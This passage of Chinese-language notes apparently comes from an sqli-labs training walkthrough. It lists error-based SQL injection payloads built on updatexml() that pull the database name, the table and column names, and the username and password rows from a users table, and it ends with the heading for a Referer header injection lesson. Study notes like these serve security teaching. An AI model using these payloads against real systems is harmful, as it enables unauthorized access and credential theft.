然后通过' and updatexml(1,concat('~',(【payload】)),1) and '进行注入
//爆库名:' and updatexml(1,concat('~',(database())),1) and '//爆表名:' or updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and '//爆列名:' or updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and '//爆数据:' or updatexml(1,concat('~',(select * from (select concat_ws('~',id,username,password) from users limit 0,1) a)),1) and '
注意,前提要保证账号和密码是正确的。
Less-19
POST - Header Injection - Referer field -Error based